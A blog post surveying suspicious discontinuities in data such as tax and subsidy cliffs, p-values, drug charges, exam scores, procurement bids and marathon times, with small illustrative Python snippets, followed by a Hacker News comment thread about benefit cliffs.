Although that's an unusually severe example, U.S. tax policy is full of discontinuities that disincentivize increasing earnings and, in some cases, actually incentivize decreasing earnings. Some other discontinuities are the TANF income limit, the Medicaid income limit, the CHIP income limit for free coverage, and the CHIP income limit for reduced-cost coverage. These vary by location and circumstance; the TANF and Medicaid income limits fall into ranges generally considered to be 'low income' and the CHIP limits fall into ranges generally considered to be 'middle class'. These subsidy discontinuities have the same impact as the ACA subsidy discontinuity -- at certain income levels, people are incentivized to lose money.

Anyone may arrange his affairs so that his taxes shall be as low as possible; he is not bound to choose that pattern which best pays the treasury. There is not even a patriotic duty to increase one's taxes. Over and over again the Courts have said that there is nothing sinister in so arranging affairs as to keep taxes as low as possible. Everyone does it, rich and poor alike and all do right, for nobody owes any public duty to pay more than the law demands.

If you agree with the famous Learned Hand quote then losing money in order to reduce effective tax rate, increasing disposable income, is completely legitimate behavior at the individual level. However, a tax system that encourages people to lose money, perhaps by funneling it to (on average) much wealthier options traders by buying put options, seems sub-optimal.

A simple fix for the problems mentioned above would be to have slow phase-outs instead of sharp thresholds. Slow phase-outs are actually done for some subsidies and, while that can also have problems, they are typically less problematic than introducing a sharp discontinuity in tax/subsidy policy.
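To make the difference concrete, here's a sketch using the ACA figures above (the 25% phase-out rate is invented for illustration). With a hard cutoff, net income is non-monotonic in earnings; with a phase-out, earning more always leaves you better off.

  CEILING = 48_560
  SUBSIDY = 7_200

  def net_income_cliff(earnings):
      # Hard cutoff: the subsidy disappears entirely above the ceiling.
      return earnings + (SUBSIDY if earnings <= CEILING else 0)

  def net_income_phaseout(earnings, rate=0.25):
      # Slow phase-out: lose 25 cents of subsidy per dollar over the ceiling.
      reduction = max(0, earnings - CEILING) * rate
      return earnings + max(0, SUBSIDY - reduction)

  for e in (48_000, 49_000, 55_000):
      print(e, net_income_cliff(e), net_income_phaseout(e))
  # Under the cliff, earning 49k or even 55k nets less than earning 48k;
  # under the phase-out, net income rises monotonically with earnings.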

In this post, we'll look at a variety of discontinuities.

Hardware or software queues

A naive queue has discontinuous behavior. If the queue is full, new entries are dropped. If the queue isn't full, new entries are not dropped. Depending on your goals, this can often have impacts that are non-ideal. For example, in networking, a naive queue might be considered 'unfair' to bursty workloads that have low overall bandwidth utilization because workloads that have low bandwidth utilization 'shouldn't' suffer more drops than workloads that are less bursty but use more bandwidth (this is also arguably not unfair, depending on what your goals are).

A class of solutions to this problem are random early drop and its variants, which gives incoming items a probability of being dropped which can be determined by queue fullness (and possibly other factors), smoothing out the discontinuity and mitigating issues caused by having a discontinuous probability of queue drops.
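A minimal sketch of the random-early-drop idea (the thresholds and probabilities here are arbitrary, and production RED implementations use a moving average of queue depth rather than the instantaneous depth):

  import random
  from collections import deque

  MIN_THRESH = 50   # below this depth, never drop
  MAX_THRESH = 90   # at or above this depth, always drop
  MAX_PROB = 0.1    # drop probability as depth approaches MAX_THRESH

  queue = deque()

  def enqueue(item):
      depth = len(queue)
      if depth >= MAX_THRESH:
          return False  # hard drop: queue is effectively full
      if depth > MIN_THRESH:
          # Drop probability ramps up linearly between the thresholds,
          # smoothing out the discontinuity of a naive tail-drop queue.
          p = MAX_PROB * (depth - MIN_THRESH) / (MAX_THRESH - MIN_THRESH)
          if random.random() < p:
              return False  # probabilistic early drop
      queue.append(item)
      return True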

This post on voting in link aggregators is fundamentally the same idea although, in some sense, the polarity is reversed. There's a very sharp discontinuity in how much traffic something gets based on whether or not it's on the front page. You could view this as a link getting dropped from a queue if it only receives N-1 votes and not getting dropped if it receives N votes.

Pell Grants started getting used as a proxy for how serious schools are about helping/admitting low-income students. The first order impact is that students above the Pell Grant threshold had a significantly reduced probability of being admitted while students below the Pell Grant threshold had a significantly higher chance of being admitted. Phrased that way, it sounds like things are working as intended.

However, when we look at what happens within each group, we see outcomes that are the opposite of what we'd want if the goal is to benefit students from low-income families. Among people who don't qualify for a Pell Grant, it's those with the lowest income who are the most severely impacted and have the most severely reduced probability of admission. Among people who do qualify, it's those with the highest income who are most likely to benefit, again the opposite of what you'd probably want if your goal is to benefit students from low-income families.

We can see these in the graphs below, which are histograms of parental income among students at two universities in 2008 (first graph) and 2016 (second graph), where the red line indicates the Pell Grant threshold.

A second order effect of universities optimizing for Pell Grant recipients is that savvy parents can do the same thing that some people do to cut their taxable income at the last minute. Someone might put money into a traditional IRA instead of a Roth IRA and, if they're at their IRA contribution limit, they can try to lose money on options, effectively transferring money to options traders who are likely to be wealthier than them, in order to bring their income below the Pell Grant threshold, increasing the probability that their children will be admitted to a selective school.

The following histograms of Russian elections across polling stations show curious spikes in turnout and results at nice, round numbers (e.g., 95%) starting around 2004. This appears to indicate that there's election fraud via fabricated results and that at least some of the people fabricating results don't bother with fabricating results that have a smooth distribution.

For finding fraudulent numbers, also see Benford's law.
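A first-digit Benford check fits in a few lines (a sketch only; real forensic work needs proper sample sizes and significance tests, and Benford's law only applies to data spanning several orders of magnitude):

  from collections import Counter
  from math import log10

  def benford_expected(d):
      # Benford's law: P(first digit = d) = log10(1 + 1/d)
      return log10(1 + 1 / d)

  def first_digit_freqs(values):
      digits = [int(str(abs(v)).lstrip('0.')[0]) for v in values if v]
      counts = Counter(digits)
      total = sum(counts.values())
      return {d: counts.get(d, 0) / total for d in range(1, 10)}

  # Compare observed vs. expected first-digit frequencies.
  observed = first_digit_freqs([1234, 1876, 2201, 3450, 911, 1999, 4096])
  for d in range(1, 10):
      print(d, round(observed.get(d, 0), 3), round(benford_expected(d), 3))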

Authors of psychology papers are incentivized to produce papers with p values below some threshold, usually 0.05, but sometimes 0.1 or 0.01. Masicampo et al. plotted p values from papers published in three psychology journals and found a curiously high number of papers with p values just below 0.05.

The spike at p = 0.05 is consistent with a number of hypotheses that aren't great, such as:

  • Authors are fudging results to get p = 0.05
  • Journals are much more likely to accept a paper with p = 0.05 than if p = 0.055
  • Authors are much less likely to submit results if p = 0.055 than if p = 0.05

Head et al. (2015) surveys the evidence across a number of fields.

Andrew Gelman and others have been campaigning to get rid of the idea of statistical significance and p-value thresholds for years, see this paper for a short summary of why. Not only would this reduce the incentive for authors to cheat on p values, there are other reasons to not want a bright-line rule to determine if something is 'significant' or not.

The top two graphs in this set of four show histograms of the amount of cocaine people were charged with possessing before and after the passing of the Fair Sentencing Act in 2010, which raised the amount of cocaine necessary to trigger the 10-year mandatory minimum prison sentence for possession from 50g to 280g. There's a relatively smooth distribution before 2010 and a sharp discontinuity after 2010.

The bottom-left graph shows the sharp spike in prosecutions at 280 grams followed by what might be a drop in 2013 after evidentiary standards were changed.

Birth month and sports

These are plots of football (soccer) players in the UEFA Youth League. The x-axis on both plots is how old players are modulo the year, i.e., their birth month normalized from 0 to 1.

The graph on the left is a histogram, which shows that there is a very strong relationship between where a person's birth falls within the year and their odds of making a club at the UEFA Youth League (U19) level. The graph on the right purports to show that birth time is only weakly correlated with actual value provided on the field. The authors use playing time as a proxy for value, presumably because it's easy to measure. That's not a great measure, but the result they find (younger-within-the-year players have higher value, conditional on making the U19 league) is consistent with other studies on sports and discrimination, which find (for example) that black baseball players were significantly better than white baseball players for decades after desegregation in baseball, and that French-Canadian defensemen are better than average (French-Canadians are stereotypically afraid to fight, don't work hard enough, and are too focused on offense).

The discontinuity isn't directly shown in the graphs above because the graphs only show birth date for one year. If we were to plot birth date by cohort across multiple years, we'd expect to see a sawtooth pattern in the probability that a player makes it into the UEFA youth league with a 10x difference between someone born one day before vs. after the threshold.
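A toy simulation of this selection effect (every parameter here is invented) shows how a modest within-year age advantage produces a large skew in who gets selected:

  import random

  def simulate(n_kids=100_000, select_frac=0.02):
      # Each kid's performance = within-year age advantage + individual talent.
      kids = []
      for _ in range(n_kids):
          birth_frac = random.random()   # 0.0 = born right after the cutoff
          relative_age = 1 - birth_frac  # older within the year = stronger
          talent = random.gauss(0, 0.5)
          kids.append((relative_age + talent, birth_frac))
      # Select the top few percent, as a competitive youth league implicitly does.
      kids.sort(reverse=True)
      selected = [b for _, b in kids[: int(n_kids * select_frac)]]
      # Fraction of the selected who were born in the first half of the year:
      return sum(b < 0.5 for b in selected) / len(selected)

  print(simulate())  # well above 0.5: early-in-year births dominate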

This phenomenon, that birth day or month is a good predictor of participation in higher-level youth sports as well as pro sports, has been studied across a variety of sports.

It's generally believed that this is caused by a discontinuity in youth sports:

  1. Kids are bucketed into groups by age in years and compete against people in the same year
  2. Within a given year, older kids are stronger, faster, etc., and perform better
  3. This causes older-within-year kids to outcompete younger kids, which later results in older-within-year kids having higher levels of participation for a variety of reasons

This is arguably a 'bug' in how youth sports work. But as we've seen in baseball as well as in a survey of multiple sports, obviously bad decision making that costs individual teams tens or even hundreds of millions of dollars can persist for decades in the face of people publicly discussing how bad the decisions are. In this case, the youth teams aren't feeder teams to pro teams, so they don't have a financial incentive to select players who are skilled for their age (as opposed to just taller and faster because they're slightly older), making this system-wide non-optimality even more difficult to fix than pro teams making locally non-optimal decisions that are completely under their control.

This is a histogram of high school exit exam scores from the Polish language exam. We can see that a curiously high number of students score 30 or just above 30 while a curiously low number of students score from 23-29. This is from 2013; other years I've looked at (2010-2012) show a similar discontinuity.

Math exit exam scores don't exhibit any unusual discontinuities in the years I've examined (2010-2013).

An anonymous reddit commenter explains this:

When a teacher is grading the matura (the final HS exam), he/she doesn't know whose test it is. The only things that are known are the number (code) of the student and the district the matura comes from (usually a completely different part of Poland). The system is designed to prevent any kind of manipulation; for example, from time to time a teacher's supervisor will come to check whether tests are graded correctly. I don't want to talk much about the system's flaws (and advantages), which are well known in every education system in the world with final tests, but you have to keep in mind that there is a key, which teachers follow very strictly when grading.

So, when the score of a test is below 30%, the exam is failed. However, before making the final statement in the protocol, a commission of 3 (I don't remember the exact number) checks the test again. This is the moment where the difference between humanities and math shows: teachers often try to find one (or a few) missing points so the test won't be failed, because failing is a tragedy for the person and his school, and somewhat of a fuss for the grading team. Finding a 'missing' point is not that hard when you are grading writing or open questions, which is the case in Polish language, but nearly impossible in math. So that's the reason why the distributions of scores are so different.

As with p-values, having a bright-line threshold causes curious behavior. In this case, scoring below 30 on any subject (a 30 or above is required in every subject) means failing the exam, which has arbitrary negative consequences for people, so teachers usually try to prevent a student from failing if there's an easy way to do it. But a deeper root of the problem is the idea that it's necessary to produce a certification that's a discretization of a continuous score.
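
The mechanism the commenter describes is easy to sketch. Here's a minimal simulation, assuming a toy score distribution and a 'find a missing point' bump near the pass mark (none of the numbers below come from the actual exam data):

    import numpy as np
    from collections import Counter

    rng = np.random.default_rng(1)

    # Toy assumption: true scores roughly normal on a 0-100 scale.
    true_scores = np.clip(rng.normal(60, 15, 200_000), 0, 100).round().astype(int)

    # Assume graders re-check failing scripts and can usually "find" a few
    # points on subjectively graded questions: scripts within 5 points of
    # the pass mark get bumped to exactly 30 with 90% probability.
    PASS = 30
    scores = true_scores.copy()
    near_miss = (scores >= PASS - 5) & (scores < PASS)
    scores[near_miss & (rng.random(len(scores)) < 0.9)] = PASS

    # The result: a dip just below 30 and a spike at exactly 30,
    # qualitatively matching the Polish language histogram.
    counts = Counter(scores)
    for s in range(22, 34):
        print(s, counts[s])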

Kawai et al. looked at Japanese government procurement in order to find suspicious patterns of bids like the ones described in Porter et al. (1993), which looked at collusion in procurement auctions on Long Island (in New York, in the United States). One example that's given is:

In February 1983, the New York State Department of Transportation (DoT) held a procurement auction for resurfacing 0.8 miles of road. The lowest bid in the auction was $4 million, and the DoT decided not to award the contract because the bid was deemed too high relative to its own cost estimates. The project was put up for a reauction in May 1983 in which all the bidders from the initial auction participated. The lowest bid in the reauction was 20% higher than in the initial auction, submitted by the previous low bidder. Again, the contract was not awarded. The DoT held a third auction in February 1984, with the same set of bidders as in the initial auction. The lowest bid in the third auction was 10% higher than the second time, again submitted by the same bidder. The DoT apparently thought this was suspicious: "It is notable that the same firm submitted the low bid in each of the auctions. Because of the unusual bidding patterns, the contract was not awarded through 1987."

It could be argued that this is expected because different firms have different cost structures, so the lowest bidder in an auction for one particular project should be expected to be the lowest bidder in subsequent auctions for the same project. In order to distinguish between collusion and real structural cost differences between firms, Kawai et al. (2015) looked at auctions where the difference in bids between the first- and second-place firms was very small, making the winner effectively random.

In the auction structure studied, bidders submit a sealed bid. If the lowest bid is below a secret reserve price, the lowest bidder wins the auction and gets the contract. If not, the lowest bid is revealed to all bidders and another round of bidding is held. Kawai et al. found that, in about 97% of auctions, the bidder who submitted the lowest bid in the first round also submitted the lowest bid in the second round (the probability that the second-lowest bidder remained second lowest was 26%).

Below is a histogram of the difference, between the first and second rounds, in the bids of the first-lowest and second-lowest bidders (left column) and of the second-lowest and third-lowest bidders (right column). Each row uses a different filtering criterion for how close the auction has to be in order to be included. In the top row, all auctions that reached a third round are included; in the second and third rows, the normalized delta between the first and second bidders is less than 0.05 and 0.01, respectively; in the last row, the normalized delta between the first and third bidders is less than 0.03. All numbers are normalized because the absolute size of auctions varies.

We can see that the distributions of deltas between the first and second rounds are roughly symmetrical when comparing the second- and third-lowest bidders. But when comparing the first- and second-lowest bidders, there's a sharp discontinuity at zero, indicating that the second-lowest bidder almost never lowers their bid by more than the first-lowest bidder did. If you read the paper, you can see that the same structure persists into auctions that go to a third round.
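
The check the paper runs can be sketched in a few lines. Given per-bidder bids in the first two rounds of each auction, compute each bidder's round-over-round change and compare the lowest bidder's change to the second-lowest bidder's; under collusion, the gap is almost never negative. The dataframe schema here is hypothetical:

    import pandas as pd

    def round_two_gaps(df: pd.DataFrame) -> pd.DataFrame:
        """df: one row per (auction_id, bidder_id) with columns 'bid_round1'
        and 'bid_round2' (hypothetical schema). Returns, per auction, the
        normalized bid changes of the two lowest first-round bidders."""
        df = df.copy()
        df["rank1"] = df.groupby("auction_id")["bid_round1"].rank(method="first")
        df["delta"] = (df["bid_round2"] - df["bid_round1"]) / df["bid_round1"]
        lowest = df[df["rank1"] == 1].set_index("auction_id")["delta"]
        second = df[df["rank1"] == 2].set_index("auction_id")["delta"]
        out = pd.DataFrame({"delta_1st": lowest, "delta_2nd": second}).dropna()
        # Collusion signature: the second-lowest bidder almost never lowers
        # their bid by more than the lowest bidder did, so this gap is
        # almost never negative and its histogram is cut off sharply at zero.
        out["gap"] = out["delta_2nd"] - out["delta_1st"]
        return out

    # gaps = round_two_gaps(bids)          # 'bids' is a hypothetical dataframe
    # print((gaps["gap"] < 0).mean())      # near 0 under collusion; near 0.5 if symmetric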

I don't mean to pick on Japanese procurement auctions in particular. There's an extensive literature on procurement auctions that has found collusion in many cases, often much more blatant than the case presented above (e.g., a few firms round-robin who wins across auctions, or every firm except the winner puts in the same losing bid).

The histograms below, of restaurant inspection scores, show a sharp discontinuity between 13 and 14, which is the cutoff between an A grade and a B grade. It appears that some regions also have a discontinuity between 27 and 28, the cutoff between a B and a C, and this older analysis from 2014 found what appears to be a similar discontinuity between B and C grades.

Inspectors have discretion in which violations are tallied, and it appears that there are cases where restaurants are nudged up to the next higher grade.

A histogram of marathon finishing times (finish times on the x-axis, count on the y-axis) across 9,789,093 finishes shows noticeable discontinuities at every half hour, as well as at 'round' times like :10, :15, and :20.

An analysis of times within each race (see section 4.4, figures 7-9) indicates that this is at least partially because people speed up (or slow down less than usual) towards the end of races if they're close to a 'round' time.
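
This kind of bunching is easy to test for in any set of finishing times. A minimal sketch (times in seconds; the one-minute window and the set of marks are arbitrary choices):

    import numpy as np

    def bunching_ratio(times_sec, mark_sec, window=60):
        """Ratio of finishers in the minute just under a target time to the
        minute just over it; values well above 1 indicate bunching."""
        t = np.asarray(times_sec)
        under = ((t >= mark_sec - window) & (t < mark_sec)).sum()
        over = ((t >= mark_sec) & (t < mark_sec + window)).sum()
        return under / max(over, 1)

    # times = load_finishing_times()          # hypothetical loader
    # for minutes in range(150, 361, 30):     # every half hour from 2:30 to 6:00
    #     print(f"{minutes // 60}:{minutes % 60:02d} "
    #           f"ratio = {bunching_ratio(times, minutes * 60):.2f}")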

Notes

This post doesn't really have a goal or a point; it's just a collection of discontinuities that I find fun.

One thing that's maybe worth noting is that I've gotten a lot of mileage in my career both out of being suspicious of discontinuities and figuring out where they come from, and out of applying standard techniques to smooth discontinuities out.

For finding discontinuities, basic tools like 'drawing a scatterplot', 'drawing a histogram', 'drawing the CDF' often come in handy. Other kinds of visualizations that add temporality, like flamescope, can also come in handy.
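
For example, an empirical CDF makes discontinuities stand out: point masses (like the spike at 30 in the exam data) show up as vertical jumps, and missing ranges show up as flat spots. A minimal version:

    import numpy as np
    import matplotlib.pyplot as plt

    def plot_ecdf(values, ax=None):
        """Step plot of the empirical CDF; vertical jumps reveal point
        masses, flat spots reveal gaps in the distribution."""
        x = np.sort(np.asarray(values))
        y = np.arange(1, len(x) + 1) / len(x)
        ax = ax or plt.gca()
        ax.step(x, y, where="post")
        ax.set_xlabel("value")
        ax.set_ylabel("fraction of observations <= value")
        return ax

    # plot_ecdf(scores)    # 'scores' is whatever series you're investigating
    # plt.show()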

We noted above that queues create a kind of discontinuity that, in some circumstances, should be smoothed out. We also noted that we see similar behavior for other kinds of thresholds and that randomization can be a useful tool to smooth out discontinuities in thresholds as well. Randomization can also be used to allow for reducing quantization error when reducing precision with ML and in other applications.
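
The quantization case is stochastic rounding: rather than always rounding to the nearest value, round up with probability equal to the fractional part, so the rounding error is zero in expectation instead of systematically biased. A minimal sketch:

    import numpy as np

    def stochastic_round(x, rng=None):
        """Round each element down or up at random, with P(round up) equal
        to the fractional part, so the expected result equals the input."""
        rng = rng or np.random.default_rng()
        x = np.asarray(x, dtype=float)
        lo = np.floor(x)
        return lo + (rng.random(x.shape) < (x - lo))

    vals = np.full(100_000, 0.1)
    print(np.round(vals).mean())           # 0.0: round-to-nearest loses the signal
    print(stochastic_round(vals).mean())   # ~0.1: unbiased in expectation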

Thanks to Leah Hanson, Omar Rizwan, Dmitry Belenko, Kamal Marhubi, Danny Vilea, Nick Roberts, Lifan Zeng, Wesley Aptekar-Cassels, Thomas Hauk, @BaudDev, and Michael Sullivan for comments/corrections/discussion.

Also, please feel free to send me other interesting discontinuities!




All Comments: [-] | anchor

btilly(768) 5 days ago [-]

The perverse incentives around these discontinuities are one of the worst misfeatures of programs intended to help people.

Here is a real example. My niece wound up with 3 kids, divorced, with inconsistent child support payments. So she went on food stamps. She was looking for a better job. She found one, interviewed, and they wanted to hire her. But the salary that they offered was $0.50/hour too much for her to stay on food stamps, and was less than her current job. Thanks to union regulations, the person who wanted to hire her couldn't pay her less than the standard salary. The result is that she did not take the job.

A common result when Congress takes note of perverse incentives like this is that they introduce a more complex program with specific terms that address specific problems that emerged. The problem is that by creating more brackets and more complex rules you usually create MORE cliffs with perverse incentives (though the perverse incentive at each cliff tends to be less).

Another solution is to introduce rules that attempt to identify people who are 'abusing the system' and punish them. So, for example, you can only be on welfare for a limited time, because people got outraged that single mothers wound up on welfare for a long time. However, those single mothers were acting that way in part because they were better off on welfare looking after their own kids than they were working a low-end job and paying for daycare.

Stereotypically the first type of solution is characteristic of Democrats and the second of Republicans. But the truth is that both parties do a lot of both solutions.

kazagistar(10000) 4 days ago [-]

The leftist solution is to get rid of the conditions entirely and find non-means-tested ways to accomplish goals more universally. The advantages are significantly reduced administrative costs; freeing up the time and energy of those in a tough situation for recovery rather than stress over bureaucracy and limitations; and, of course, people not viewing those on the programs as morally deficient.

Social security, fire departments, Medicare, primary education, etc. are all available broadly, and are broadly liked. People using these government handouts aren't considered lesser for it.

Polylactic_acid(10000) 5 days ago [-]

I'm not an expert on the system in Australia, but from what I've heard, there isn't a cutoff point where if you make x you're eligible and if you make x+1 you aren't. Instead, it's a slope: if you make x+1, you lose a certain % of the payments, until you eventually make enough to lose them all. But at all times it's still better to take the job.

dragonwriter(4317) 5 days ago [-]

> The perverse incentives around these discontinuities is one of the worst misfeatures of programs intended to help people.

This is a key motivation for replacing many of those programs with UBI funded by progressive taxes.

boomboomsubban(10000) 5 days ago [-]

>But the salary that they offered was $0.50/hour too much for her to stay on food stamps, and was less than her current job

The salary was lower but would somehow remove her eligibility for food stamps?

dTal(3892) 4 days ago [-]

>the salary that they offered was $0.50/hour too much for her to stay on food stamps, and was less than her current job

I don't understand. How was she eligible for food stamps, if she already had a job that paid more?

bo1024(10000) 4 days ago [-]

This is one reason behind universal basic income as a welfare program. There are no hoops, no cutoffs, no distortion of incentives.

SilasX(4179) 5 days ago [-]

Relatedly, I learned about Universal Credit, an attempt by the UK to merge all their social benefits into one coherent system, and it seems like the cliff problem here is worse. From the BBC description:

https://www.bbc.com/news/uk-41487126

>Under the old system many faced a 'cliff edge', where people on a low income would lose a big chunk of their benefits in one go as soon as they started working more than 16 hours.

>In the new system, benefit payments are reduced at a consistent rate as income and earnings increase - for every extra £1 you earn after tax, you will lose 63p in benefits.

In other words, after fixing the cliffs of the system, you would 'only' face a 63% effective tax rate for working more. So whatever system they have now is even more discouraging. (That understates it, because it's phrased post-tax; including positive income tax, the total effective tax is even higher!)
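
To put a rough number on that: the 63p taper applies to post-tax earnings, so assuming a combined income tax and National Insurance rate of around 32% (an illustrative figure), the total effective marginal rate on an extra £1 is roughly 0.32 + 0.63 × (1 − 0.32) ≈ 0.75, i.e. about 75p of each additional £1 earned is lost to tax and benefit withdrawal.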

mrfusion(699) 5 days ago [-]

I guess, like the article mentions, she could have bought put options.

jonnycomputer(4312) 4 days ago [-]

I agree, and I have my own stories to tell (like my food stamps admin telling me to spend my tax return as quickly as possible or I'd lose food stamps, which is doubly perverse).

As for tax brackets, why do they exist? I think our mathematics is advanced enough that things like tax brackets could be replaced by continuous functions. So it's either by design or by lack of imagination that these discontinuities exist.

I've a friend from Finland who is vehemently opposed to any sort of means testing for any social program or aid. I see his point. Means testing creates all of the problems mentioned above ... and encourages those not eligible for them to view them as some burden that other people get but they pay for--fostering resentment.

113(10000) 4 days ago [-]

Sounds like the business should be paying their employees enough to feed their families.

selimthegrim(2089) 5 days ago [-]

How about the US killing like 10 "Al Qaeda No 2"s in a row for a while in Iraq

mumblemumble(3908) 5 days ago [-]

If you order your hit list right, you can kill a continuous streak of #2s, until there's only one person left.

refurb(2493) 5 days ago [-]

How is that weird? #2 gets killed, new #2 takes his/her place, #2 gets killed.

cs702(965) 5 days ago [-]

Any rules that can be gamed, sooner or later, inevitably, will be gamed.

The 'suspicious discontinuities' shown in this fantastic post are evidence for it.

It seems to be an Iron Law of Human Nature.

ChainOfFools(10000) 5 days ago [-]

what gets measured gets treasured

hn_throwaway_99(4203) 5 days ago [-]

This 'Iron Law of Human Nature' is a corollary of Goodhart's Law: https://en.wikipedia.org/wiki/Goodhart%27s_law

aeturnum(10000) 5 days ago [-]

This is a lovely post and good general demonstration on this phenomenon. The drug charging graph is particularly stark.

I think the most interesting graph is the final one, for marathon finishing times. The idea that people will fudge numbers to meet (or avoid) official definitions is commonly believed (and shown repeatedly here). It's more interesting to observe that it's not just people using motivated reasoning, but also that people will alter their performance to hit highly visible targets.

Wehrdo(10000) 4 days ago [-]

I think another factor in the marathon finishing time discontinuities is the use of pacers: people who run carrying signs at a pre-defined speed (usually targeting a specific finishing time, e.g. 3:15). Lots of people who have finishing goals will run in a pack with this person so they know they're going fast enough, then will all finish just under the target time.

kauffj(4078) 5 days ago [-]

At least to me, the discontinuities in things like TANF, Medicaid, CHIP, etc. are some of the greatest signs of political dysfunction.

There's nothing remotely partisan about these being a bad thing. _Everyone_ should agree that these make no sense and mis-incentivize behavior. Yet these flaws remain for decades despite being known and discussed for approximately the entirety of their existence.

Balgair(1634) 5 days ago [-]

Not to belittle the lives that depend on this stuff, but these issues go back to flippin' Rome. The Grain Dole was a huge part of Roman politics and its history is fascinating reading:

https://en.wikipedia.org/wiki/Cura_Annonae#Politics_and_the_...

These issues are not very complicated: give people free stuff and they support you, let the next consuls/emperor worry about the revolts in Sicily (or whatever) that the Dole causes.

We keep saying that these problems will come back to haunt us, but that's all history has ever been.

thedance(10000) 5 days ago [-]

It's the stated goal of the party in power to throw as many kids off food assistance as possible. If the program has quirks, that is by design.

chillacy(10000) 4 days ago [-]

It always seems like these programs being attackable is a benefit because it lets you continuously rally passionate donors to always fight for the programs and fund campaigns. Conversely, stable universal programs don't draw as much attention and fundraising.

stared(625) 5 days ago [-]

Regarding the Polish end-of-high-school exams: quite a few years ago I created an interactive widget to explore this: https://github.com/stared/delab-matury.

There are a few jokes about the Matural Distribution (Matura is the name of this exam) or the Polish Gaussian.

It is the Polish language exam that is the most discontinuous. However:

- There are quite a few scores for the essay which are subjective (e.g. on the style).

- It is official procedure that, in the case of results on the edge, the person marking should resolve an ambiguous score in favour of the student.

ehnto(4300) 5 days ago [-]

> It is an official procedure that in the case of results on the edge, the person marking should mark an ambiguous score in the favour of the student

Given that it's subjective, I find that a really